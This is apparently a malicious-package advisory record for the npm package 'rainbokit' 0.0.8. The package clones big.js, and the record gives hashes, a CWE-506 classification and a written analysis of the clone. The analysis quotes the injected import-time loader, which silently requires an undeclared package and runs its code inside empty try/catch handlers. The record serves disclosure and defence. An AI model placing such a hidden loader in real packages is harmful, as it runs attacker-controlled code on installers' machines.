-= Per source details. Do not edit below this line.=-
The package publishes as rainbokit but ships a verbatim copy of the legitimate big.js library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both big.js (~line 488) and big.mjs contain an injected block try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } inserted into the middle of the otherwise-unmodified big.js source. When a consumer does require('rainbokit') or import 'rainbokit', this block runs parket-slot.from_str() — code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). parket-slot is not declared in dependencies; the only declared dependency is log-taker@^0.0.9, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves parket-slot and log-taker from sibling packages they control. The combination of identity spoofing of a popular package, hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.
{
"malicious-packages-origins": [
{
"import_time": "2026-06-23T20:48:30.343279355Z",
"source": "amazon-inspector",
"sha256": "692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555",
"versions": [
"0.0.8"
],
"id": "IN-MAL-2026-007352",
"modified_time": "2026-06-23T20:01:22Z"
}
]
}{
"evidence_files": [
{
"tlsh": "24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
"sha256": "5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace",
"path": "big.js"
},
{
"tlsh": "c5210467c9a59da70af86ba47c6c03aaf1151b1f00a08c57b07b130c4b3355b2095bbd",
"sha256": "f27b0f0cf64e2f0fa98af800ba0c69165e32467f71217cea46b728ae47c6ef66",
"path": "package.json"
}
],
"package_integrity": [
{
"filename": "rainbokit-0.0.8.tgz",
"hashes": {
"sha1": "e107f63317c88d055fbd985080782ebfe649544f",
"sha512_sri": "sha512-7Fg9gkQIbCKJn9Q19TIzfaRWCdfzYaqL0zUjnUoU5O0hPoAiL/0X6J/wBTlwQTdmKB1k7IZO2w5zC+gNlUsd0w=="
}
}
]
}
[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/rainbokit/MAL-2026-6339.json"